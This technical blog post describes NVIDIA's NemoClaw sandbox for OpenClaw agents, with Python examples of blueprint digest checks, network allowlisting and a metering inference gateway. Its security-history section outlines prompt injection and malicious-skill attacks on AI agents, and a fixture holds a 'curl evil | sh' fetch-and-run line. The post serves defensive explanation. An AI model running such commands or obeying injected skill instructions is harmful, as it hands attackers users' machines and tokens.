NemoClaw and Stripe MPP for OpenClaw agent billing security
Put an agent in a sandbox and its file system is restricted and its outbound network is allowlisted. But what happens when the agent needs to call an external API that bills you?
Reading NVIDIA’s OpenClaw sandbox plugin NemoClaw together with Stripe’s Machine Payments Protocol (MPP) gives a clue.
Why a sandbox is needed
OpenClaw has already accumulated a long security history:
- AMOS (Atomic macOS Stealer) distribution through malicious SKILL.md files
- Clinejection: npm token theft through prompt injection
- RCE, supply-chain contamination, and memory poisoning
- Earlier local-sandbox responses such as Agent Safehouse and Codex sandboxing
```mermaid
flowchart TD
A["ClawHub / SkillsMP / skills.sh"] -->|malicious SKILL.md| B["OpenClaw agent"]
B -->|"AI presents fake install instructions"| C["AMOS infection"]
D["GitHub issue title"] -->|prompt injection| E["AI triage bot"]
E -->|"cache poisoning → npm token theft"| F["OpenClaw auto-install on 4,000 machines"]
G["CVE-2026-25253"] -->|"malicious gatewayUrl"| H["Token theft / RCE"]
I["malicious skills"] -->|"rewrite SOUL.md / MEMORY.md"| J["Memory poisoning"]
```
The numbers are not small either: the ClawHavoc tally doubled to 824 malicious skills, the AMOS campaigns were broad, and CVE-2026-25253 affected more than 30,000 publicly exposed instances.
NemoClaw architecture
NemoClaw is an OpenClaw plugin that runs inside NVIDIA’s OpenShell secure runtime. It uses K3s in Docker and is released under Apache 2.0.
```mermaid
graph TD
A[OpenClaw\nagent core] --> B[OpenShell\nsecure runtime]
C[NemoClaw\nNVIDIA plugin] --> B
B --> D[K3s inside Docker\nKubernetes cluster]
D --> E[Sandbox environment]
E --> F[NVIDIA cloud\ninference endpoint]
```
OpenShell also supports Claude Code, Codex, Ollama, and others, but NemoClaw is specialized for OpenClaw and NVIDIA inference.
The key difference from desktop sandboxing is that NemoClaw is a server-side protection layer built around K3s clusters.
Blueprint architecture
NemoClaw has two layers:
| Layer | Language | Role |
|---|---|---|
| Plugin | TypeScript | CLI and UI layer |
| Blueprint | Python | Orchestrates sandbox creation, policy application, and inference settings |
Blueprints move through a five-stage lifecycle:
```mermaid
graph LR
A[Resolve] --> B[Verify]
B --> C[Plan]
C --> D[Apply]
D --> E[Status]
```
Verification checks the artifact digest before anything is planned or applied, so a blueprint that was swapped between resolution and installation is rejected. Given ClawHub’s history of malicious skills, this pinning matters, though a matching digest only proves you received the bytes you pinned, not that those bytes were ever safe.
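To make the lifecycle concrete, here is an added example (not NemoClaw’s own blueprint code) that walks Resolve → Verify → Plan → Apply → Status with the digest check gating everything after Resolve. The manifest format, the in-memory “registry”, and the pinned digest are constructed for this illustration.

```python
"""Added example: five-stage blueprint lifecycle with a digest gate after Resolve.
Not NemoClaw's code; the registry, manifest format and pinned digest are constructed."""
import hashlib
import hmac
from dataclasses import dataclass, field


@dataclass
class Blueprint:
    ref: str
    pinned_digest: str                  # sha256 hex recorded when the ref was pinned
    artifact: bytes = b""
    stage: str = "resolved"             # resolved -> verified -> planned -> applied
    plan: list = field(default_factory=list)
    applied: list = field(default_factory=list)
    error: str = ""


def resolve(ref: str, pinned_digest: str, registry: dict) -> Blueprint:
    """Stage 1: fetch the artifact bytes for `ref` (here from an in-memory dict)."""
    if ref not in registry:
        raise KeyError(f"unknown blueprint ref {ref!r}")
    return Blueprint(ref=ref, pinned_digest=pinned_digest, artifact=registry[ref])


def verify(bp: Blueprint) -> Blueprint:
    """Stage 2: the fetched bytes must hash to the pinned digest. A swapped or
    tampered artifact fails here and never reaches Plan or Apply."""
    actual = hashlib.sha256(bp.artifact).hexdigest()
    if not hmac.compare_digest(actual, bp.pinned_digest):
        bp.stage = "verify-failed"
        bp.error = f"digest mismatch: got {actual[:12]}, pinned {bp.pinned_digest[:12]}"
    else:
        bp.stage = "verified"
    return bp


def plan(bp: Blueprint) -> Blueprint:
    """Stage 3: turn the verified manifest into steps. Refuses unverified input."""
    if bp.stage != "verified":
        raise RuntimeError(f"cannot plan {bp.ref}: stage is {bp.stage}")
    for line in bp.artifact.decode().splitlines():
        key, _, value = line.partition(":")
        bp.plan.append((key.strip(), value.strip()))
    bp.stage = "planned"
    return bp


def apply(bp: Blueprint) -> Blueprint:
    """Stage 4: execute the plan (simulated: each step is recorded as applied)."""
    if bp.stage != "planned":
        raise RuntimeError(f"cannot apply {bp.ref}: stage is {bp.stage}")
    bp.applied.extend(bp.plan)
    bp.stage = "applied"
    return bp


def status(bp: Blueprint) -> dict:
    """Stage 5: report where the blueprint ended up and why."""
    return {"ref": bp.ref, "stage": bp.stage, "applied": len(bp.applied), "error": bp.error}


def run_lifecycle(ref: str, pinned_digest: str, registry: dict) -> dict:
    """Resolve -> Verify -> Plan -> Apply -> Status, stopping at the first failure."""
    bp = verify(resolve(ref, pinned_digest, registry))
    if bp.stage == "verified":
        apply(plan(bp))
    return status(bp)


# Constructed manifest and the digest an operator would have pinned for it.
GOOD_MANIFEST = b"name: demo-skill\nentry: run.sh\n"
PINNED_DIGEST = hashlib.sha256(GOOD_MANIFEST).hexdigest()

# Two constructed registries: one honest, one where the artifact was replaced
# after pinning (the substitution case the digest check exists to catch).
HONEST_REGISTRY = {"demo-skill": GOOD_MANIFEST}
TAMPERED_REGISTRY = {"demo-skill": b"name: demo-skill\nentry: curl evil | sh\n"}

if __name__ == "__main__":
    print(run_lifecycle("demo-skill", PINNED_DIGEST, HONEST_REGISTRY))
    print(run_lifecycle("demo-skill", PINNED_DIGEST, TAMPERED_REGISTRY))
```

The tampered registry stops at `verify-failed` with nothing applied. Note what the check does not do: if the manifest was malicious at the moment it was pinned, its digest matches and it sails through, which is why the page still calls for model-level defenses against malicious skills.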
Four-layer security
| Layer | Protection | Locking |
|---|---|---|
| Network | Block unauthorized outbound connections | Hot-reloadable |
| File system | Only allow /sandbox and /tmp writes | Fixed at sandbox creation |
| Process | Block privilege escalation and dangerous syscalls | Fixed at sandbox creation |
| Inference | Route model calls to controlled backends | Hot-reloadable |
The stack combines Landlock LSM, seccomp, and network namespaces. Network and inference policies can be updated without restarting the sandbox.
Binary-based network control
The baseline policy can restrict network access by binary, endpoint, and HTTP method:
| Endpoint | Limits |
|---|---|
| api.anthropic.com:443 | claude binary only |
| integrate.api.nvidia.com:443 | Inference |
| github.com:443 / api.github.com:443 | gh / git binaries with method control |
| openclaw.ai:443 / clawhub.com:443 | No limit |
| registry.npmjs.org:443 | GET only |
If an agent tries to reach anything outside the baseline, the operator gets a TUI prompt in openshell term. An approval applies only to the current session.
That leaves one concern: the baseline allows clawhub.com without limit, yet ClawHub has been a major source of malicious skills, so model-level defenses are still needed. File-system restrictions cannot stop prompt injection once a malicious SKILL.md is in the context.
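The following added example (not OpenShell’s policy engine or its configuration format) models the semantics described above: the baseline table encoded as data, a prompt for anything outside it, approvals that live only for one session, and a hot reload that swaps rules without disturbing the sandbox. The rule structure and the exact HTTP methods permitted for the GitHub rows are assumptions; the page only says “method control”.

```python
"""Added example: binary-aware outbound network policy with session-scoped approvals.
Not OpenShell's code; rule format and the GitHub method sets are assumptions."""
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class Rule:
    host: str
    port: int
    binaries: Optional[FrozenSet[str]] = None   # None = any binary may use this endpoint
    methods: Optional[FrozenSet[str]] = None    # None = any HTTP method

    def matches(self, binary: str, host: str, port: int, method: str) -> bool:
        return (host == self.host and port == self.port
                and (self.binaries is None or binary in self.binaries)
                and (self.methods is None or method in self.methods))


def baseline_rules() -> list:
    """The baseline table from the page as data. GET/POST for the GitHub rows is an
    assumption for this example; the page says only that methods are controlled."""
    gh = frozenset({"gh", "git"})
    return [
        Rule("api.anthropic.com", 443, frozenset({"claude"})),
        Rule("integrate.api.nvidia.com", 443),
        Rule("github.com", 443, gh, frozenset({"GET", "POST"})),
        Rule("api.github.com", 443, gh, frozenset({"GET", "POST"})),
        Rule("openclaw.ai", 443),
        Rule("clawhub.com", 443),
        Rule("registry.npmjs.org", 443, None, frozenset({"GET"})),
    ]


class NetworkPolicy:
    """Evaluates (binary, host, port, method). `decide` returns 'allow' or 'prompt';
    approvals are stored per session, so a fresh session starts from the baseline."""

    def __init__(self, rules):
        self.rules = list(rules)
        self._session_grants = {}   # session_id -> set of approved (binary, host, port, method)

    def reload(self, rules) -> None:
        """Hot reload: replace the rule set; running sessions and their grants survive."""
        self.rules = list(rules)

    def decide(self, session_id: str, binary: str, host: str, port: int, method: str = "GET") -> str:
        key = (binary, host, port, method)
        if any(r.matches(*key) for r in self.rules):
            return "allow"
        if key in self._session_grants.get(session_id, set()):
            return "allow"
        return "prompt"   # operator sees a TUI prompt; nothing leaves until they answer

    def operator_answer(self, session_id: str, binary: str, host: str, port: int,
                        method: str, approve: bool) -> str:
        """Record the operator's answer. A grant is valid for this session only."""
        if approve:
            self._session_grants.setdefault(session_id, set()).add((binary, host, port, method))
            return "allow"
        return "deny"

    def end_session(self, session_id: str) -> None:
        self._session_grants.pop(session_id, None)


if __name__ == "__main__":
    policy = NetworkPolicy(baseline_rules())
    print(policy.decide("s1", "claude", "api.anthropic.com", 443, "POST"))   # allow
    print(policy.decide("s1", "curl", "api.anthropic.com", 443, "POST"))     # prompt
    print(policy.decide("s1", "npm", "registry.npmjs.org", 443, "PUT"))      # prompt
```

The example takes the calling binary as a trusted input; in the real stack that attribution comes from the runtime, not from the process naming itself. The “no limit” rows are exactly what the concern above is about: a rule like `Rule("clawhub.com", 443)` lets any binary in the sandbox fetch anything from that host, so a malicious skill is one allowed download away.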
Inference routing and cost control
Inference requests do not leave the sandbox directly. OpenShell intercepts them and forwards them to NVIDIA cloud.
```mermaid
sequenceDiagram
participant A as Agent (inside sandbox)
participant G as OpenShell Gateway
participant N as NVIDIA cloud (build.nvidia.com)
A->>G: Inference request
G->>N: Controlled routing
N->>G: Response
G->>A: Forward response
```
The default model is Nemotron 3 Super 120B, and smaller or local models can also be configured. The gateway can track token usage and make inference costs visible, which matters for billing.
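As an added example (not OpenShell’s gateway code), here is the broker pattern the diagram implies: the agent inside the sandbox never holds the upstream credential, the gateway injects it, pins which backends may be called, and meters token usage from each reply. It goes one step beyond the page, which only says the gateway makes costs visible, by also refusing requests once a per-session token budget is spent. The backend, its usage accounting, and the price table are constructed for this illustration and are not NVIDIA’s API or pricing.

```python
"""Added example: a metering inference gateway that brokers the upstream credential.
Not OpenShell's code; backend, usage format and price table are constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, Iterable

# Constructed price table (USD per 1k tokens), used only for the cost report.
PRICE_PER_1K = {"nemotron-3-super": 0.002, "local-small": 0.0}


def fake_backend(model: str, prompt: str, api_key: str) -> dict:
    """Stand-in for the inference endpoint: rejects a bad credential, returns a
    canned completion and reports token usage the way hosted APIs do."""
    if api_key != "upstream-secret":
        return {"error": "unauthorized"}
    completion = ["ok"] * 3
    return {"text": " ".join(completion),
            "usage": {"prompt_tokens": len(prompt.split()),
                      "completion_tokens": len(completion)}}


@dataclass
class SessionLedger:
    budget_tokens: int
    prompt_tokens: int = 0
    completion_tokens: int = 0
    estimated_usd: float = 0.0
    refused: int = 0

    @property
    def used_tokens(self) -> int:
        return self.prompt_tokens + self.completion_tokens


class InferenceGateway:
    def __init__(self, upstream_key: str, allowed_models: Iterable[str],
                 backend: Callable = fake_backend):
        self._upstream_key = upstream_key        # lives here, never inside the sandbox
        self.allowed_models = set(allowed_models)
        self.backend = backend
        self.ledgers: Dict[str, SessionLedger] = {}

    def open_session(self, session_id: str, budget_tokens: int) -> None:
        self.ledgers[session_id] = SessionLedger(budget_tokens=budget_tokens)

    def infer(self, session_id: str, model: str, prompt: str) -> dict:
        """What the sandboxed agent calls. Note there is no credential parameter."""
        ledger = self.ledgers[session_id]
        if model not in self.allowed_models:
            ledger.refused += 1
            return {"error": f"model {model!r} not allowed by policy"}
        # Budget is checked before the call, so one request can overshoot by its own
        # size; a real gateway would also cap max_tokens on the outgoing request.
        if ledger.used_tokens >= ledger.budget_tokens:
            ledger.refused += 1
            return {"error": "session token budget exhausted"}
        reply = self.backend(model, prompt, self._upstream_key)
        if "usage" in reply:
            used = reply["usage"]["prompt_tokens"] + reply["usage"]["completion_tokens"]
            ledger.prompt_tokens += reply["usage"]["prompt_tokens"]
            ledger.completion_tokens += reply["usage"]["completion_tokens"]
            ledger.estimated_usd += used / 1000 * PRICE_PER_1K.get(model, 0.0)
        # Forward only what the agent needs; nothing about the upstream credential.
        return {k: reply[k] for k in ("text", "usage", "error") if k in reply}

    def cost_report(self, session_id: str) -> dict:
        ledger = self.ledgers[session_id]
        return {"tokens": ledger.used_tokens, "budget_tokens": ledger.budget_tokens,
                "refused": ledger.refused, "estimated_usd": round(ledger.estimated_usd, 6)}


if __name__ == "__main__":
    gw = InferenceGateway("upstream-secret", ["nemotron-3-super"])
    gw.open_session("s1", budget_tokens=12)
    for _ in range(3):
        print(gw.infer("s1", "nemotron-3-super", "summarise this file"))
    print(gw.cost_report("s1"))
```

With a budget of 12 tokens and 6 tokens per constructed call, the third request is refused and the report shows the spend. The same shape is what the billing question below needs: the thing that pays sits outside the sandbox, sees every request, and can stop.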
The billing problem
That brings us back to the original question: if the agent is sandboxed but still needs to use a paid external API, how do you let it pay without handing over private keys? Stripe’s MPP is the payment side of that answer, but the safe integration story is still being worked out.